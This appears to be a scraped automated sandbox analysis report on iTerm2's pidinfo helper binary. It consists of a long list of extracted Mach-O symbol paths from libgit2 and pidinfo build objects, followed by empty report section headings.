Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/submodules/libgit2/src/xdiff/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/submodules/libgit2/src/xdiff/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(sha1.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(refspec.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(regexp.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(registry.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(remote.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(repository.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(revparse.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(revwalk.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(runtime.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(refs.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(smart_pkt.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(smart_protocol.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(socket.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(sortedcache.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(ssh.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(status.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(stdalloc.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(stransport.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(signature.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(smart.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(sysdir.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(tag.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(thread.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(threadstate.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(tls.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(trace.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(transaction.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(strarray.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(strmap.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(submodule.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(ubc_check.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(unicode_builtin.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(util.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(util.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(varint.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(vector.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(transport.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(tree-cache.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(tree.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(tsort.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xmerge.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xpatience.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xprepare.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xutils.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(zstream.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(wildmatch.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(worktree.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xdiffi.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xemit.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(xhistogram.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/pidinfo/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/pidinfo/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/pidinfo/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/pidinfo/
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/PIDInfoGitState.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/iTermFileDescriptorServerShared.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/iTermGitClient.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/iTermGitState.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/main.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/build/iTerm2.build/Deployment/pidinfo.build/Objects-normal/x86_64/pidinfo.o
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(mbedtls.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(merge.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(merge_driver.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(merge_file.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(midx.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(iterator.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(libgit2.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(local.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(mailmap.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(map.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(odb.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(odb_loose.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(odb_pack.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(offmap.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(mwindow.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(net.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(netops.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(ntlm.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(object.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt/ThirdParty/libgit2/lib/libgit2.a(object_api.c.o)
Source: extracted file from submission iTerm\iTerm.app\Contents\XPCServices\pidinfo.xpc\Contents\MacOS\pidinfo	Mach-O symbol: /Users/gnachman/git/iterm2-alt

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

macOS Analysis Report mUiLRcXJdd

Overview

General Information

Detection

Signatures

Classification

General Information

Process Tree

Yara Overview

Memory Dumps

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation: